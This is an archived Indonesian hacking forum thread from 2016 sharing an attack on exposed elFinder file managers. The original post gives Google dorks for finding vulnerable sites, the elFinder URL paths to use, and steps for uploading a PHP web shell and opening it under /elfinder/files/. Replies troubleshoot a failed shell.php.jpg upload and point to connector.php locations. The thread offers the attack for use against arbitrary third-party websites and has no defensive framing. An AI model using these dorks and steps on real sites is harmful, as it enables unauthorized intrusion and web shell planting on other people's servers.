+- BackBox Indonesia (https://www.backboxindonesia.or.id)
+-- Forum: Attacking (https://www.backboxindonesia.or.id/forum-12.html)
+--- Forum: Web Attack (https://www.backboxindonesia.or.id/forum-15.html)
+--- Thread: eXploit elFinder Shell Upload Vulnerability (/thread-117.html)
eXploit elFinder Shell Upload Vulnerability - Nue Bhandell - 05-02-2016
![[Image: bug.jpg]](https://1.bp.blogspot.com/-SlQEIGwywP0/Vx8cSITah2I/AAAAAAAAAs4/DVuJ3CGJ2u0-Lyb9Czj5PfvBKuLhFe5iACKgB/s320/bug.jpg)
*nyari Bug mulu, nyari pacarnya kapan* xD
iseng2 share exploit lama, kali aja masih crotz awkakw.
untuk Tutorial Auto exploiter elFinder nya bisa cek dimari -> Auto Exploiter elFinder
yg dah master minggir dlu beb :heart:
DORK:
inurl:/elfinder/elfinder.php.html
inurl:/elfinder/files/
Exploit:
http://site.com/[path]/elfinder/elfinder.html
http://site.com/[path]/elfinder/elfinder.php.html
http://site.com/[path]/elfinder/src/elfinder-src.php.html
dan kebetulan ditarget Nue kali ini, Exploitnya terletak di:
www.target.com/elfinder/elfinder.html
![[Image: CGfmmii.png]](http://i.imgur.com/CGfmmii.png)
Tuh tinggal Upload File/Shell Lo aja :D
Shell Akses o.O ??
klik kanan di file yg telah di upload, lalu klik get info/klik yang paling bawah
Lalu Klik Deh nama shell agans :3
![[Image: PtS4XpS.png]](http://i.imgur.com/PtS4XpS.png)
Atau langsung ke site nya:
http://target.co.li/[path]/elfinder/files/shellkamu.php
![[Image: Y6cKOyB.png]](http://i.imgur.com/Y6cKOyB.png)
Yuk yang regional Jakarta Join Grup FB:
Jakarta BackBox Team
xixihi kunjungin Blog ane juga yak :rolleyes: TKJ Cyber Art
semoga bermanfaat Gengs, maap kalo post cupu
![[Image: smile.png]](https://www.backboxindonesia.or.id/images/smilies/smile.png)
waktunya Nue dan tim Katakan Putus cabut dulu gengs,
![[Image: cool.png]](https://www.backboxindonesia.or.id/images/smilies/cool.png){kind=small}
Bye~
SUMUR
RE: eXploit elFinder Shell Upload Vulnerability - teh - 05-02-2016
kang ane udah upload shell nya tapi ngga di kasih hak akses oleh sistem
![[Image: ztslrk.png]](http://i67.tinypic.com/ztslrk.png)
udah ane tambhin ekstensi shell.php.jpg udah ke upload klo cara buka shell nya gmana yaa kang hehehe
maaf repotin
RE: eXploit elFinder Shell Upload Vulnerability - Tu5b0l3d - 05-03-2016
(05-02-2016, 10:28 PM)teh Wrote: kang ane udah upload shell nya tapi ngga di kasih hak akses oleh sistem
udah ane tambhin ekstensi shell.php.jpg udah ke upload klo cara buka shell nya gmana yaa kang hehehe
maaf repotin
biasanya di /elfinder/files/
atau liat aja connector.php
adanya di /elfinder/connectors/php/connector.php
atau di /elfinder/php/connector.php